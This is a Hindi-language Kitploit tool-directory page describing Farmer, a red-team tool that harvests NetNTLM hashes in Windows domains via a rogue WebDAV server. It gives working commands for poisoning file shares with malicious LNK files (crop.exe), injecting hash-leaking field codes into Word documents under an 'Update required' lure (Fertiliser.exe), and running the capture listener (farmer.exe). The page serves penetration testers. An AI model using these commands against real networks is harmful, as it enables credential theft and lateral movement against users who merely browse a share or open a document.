Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mdsecactivebreach/farmer
फ़िशिंग उपकरणपासवर्ड हमलेपार्श्व आंदोलनजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubmdsecactivebreach/farmer

Farmer

Windows डोमेन में NetNTLM हैश को एक स्थानीय WebDAV सर्वर के माध्यम से एकत्र करता है, जिसमें LNK फ़ाइल विषाक्तता और Office दस्तावेज़ फ़ील्ड कोड इंजेक्शन का उपयोग करके पार्श्व गति और क्रेडेंशियल कैप्चर किया जाता है।

रिपॉजिटरी देखें
427605 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Farmer

लेखक: @domchell

अवलोकन

मैं एक किसान बनना चाहता था, इसलिए मैंने हैश की फसल काटनी शुरू कर दी

Farmer एक विंडोज डोमेन में NetNTLM हैश एकत्र करने की एक परियोजना है। Farmer यह एक स्थानीय WebDAV सर्वर बनाकर प्राप्त करता है जो किसी भी कनेक्ट करने वाले क्लाइंट से WebDAV Mini Redirector को प्रमाणित करने का कारण बनता है।

Farmer के सफल होने के लिए, क्लाइंट को स्थानीय WebDAV सर्वर से कनेक्ट करने में सक्षम होना चाहिए। संभावित चीजें जो इसे रोक सकती हैं उनमें नेटवर्क सेगमेंटेशन और/या विंडोज फायरवॉल शामिल हैं। पहले इनकी जाँच अवश्य करें (संकेत Seatbelt WindowsFirewall)।

फसल का प्रसार

Farmer में Crop टूल के लिए एक उप-मॉड्यूल शामिल है, इस टूल का उपयोग LNK फ़ाइलें बनाने के लिए किया जा सकता है जो किसी फ़ोल्डर में ब्राउज़ करने पर WebDAV कनेक्शन शुरू करता है जहाँ LNK संग्रहीत है क्योंकि यह संग्रहीत आइकन को प्रस्तुत करने का प्रयास करेगा।

हमले की अवधारणा यह है कि आपको Crop का उपयोग करके वांछित फ़ाइल शेयरों को LNK फ़ाइल से दूषित करना चाहिए जो Farmer WebDAV सर्वर की ओर इशारा करता है।

उदाहरण के लिए:

root@kitploit:~
crop.exe \\fileserver\Common crop.lnk \\workstation@8888\harvest \\workstation@8888\harvest

जब कोई उपयोगकर्ता \fileserver\Common पर ब्राउज़ करता है, तो एक्सप्लोरर Farmer WebDAV सर्वर से आइकन प्राप्त करने का प्रयास करेगा और ऐसा करने में उपयोगकर्ता का NetNTLM हैश प्रस्तुत करेगा।

फसल को उर्वरित करना

Farmer में Fertiliser टूल के लिए एक और उप-मॉड्यूल शामिल है, इस टूल का उपयोग Office दस्तावेज़ों (वर्तमान में केवल docx) को एक दुर्भावनापूर्ण फ़ील्ड कोड से दूषित करने के लिए किया जा सकता है। इससे दस्तावेज़ खोलने पर फ़ील्ड कोड पार्स हो जाता है और आपकी पसंद के WebDAV सर्वर पर हैश लीक हो जाएगा :)

उदाहरण के लिए:

root@kitploit:~
Fertiliser.exe \\fileserver\important.docx http://workstation:8888/foo "Update required"

खेती

Farmer एक उपयोगकर्ता-परिभाषित पोर्ट पर, निश्चित सेकंड के लिए सुनेगा और आवश्यक होने पर आउटपुट को फ़ाइल सिस्टम पर लिखेगा:

उपयोग:

root@kitploit:~
farmer.exe <port> [seconds] [output]

यदि कोई सेकंड निर्दिष्ट नहीं किया गया है, या इसे 0 पर सेट किया गया है, तो farmer अनिश्चित काल तक चलेगा, उदाहरण के लिए:

root@kitploit:~
farmer.exe 8888 0 c:\windows\temp\test.tmp

Farmer को पोर्ट 8888 पर एक मिनट के लिए चलाने के लिए, निम्न कार्य करें:

root@kitploit:~
farmer.exe 8888 60

यदि आप Farmer लॉग को फ़ाइल सिस्टम पर लिखना चाहते हैं, तो आप Config.key में सेट की गई कुंजी का उपयोग करके लॉग फ़ाइल को AES एन्क्रिप्ट कर सकते हैं और एन्क्रिप्ट बूल को true (डिफ़ॉल्ट false) पर सेट कर सकते हैं।

लॉग फ़ाइल को HarvestCrop टूल से डिक्रिप्ट किया जा सकता है, उदाहरण के लिए:

root@kitploit:~
harvestcrop.exe c:\windows\temp\test.tmp farmer
टूल डाउनलोड करें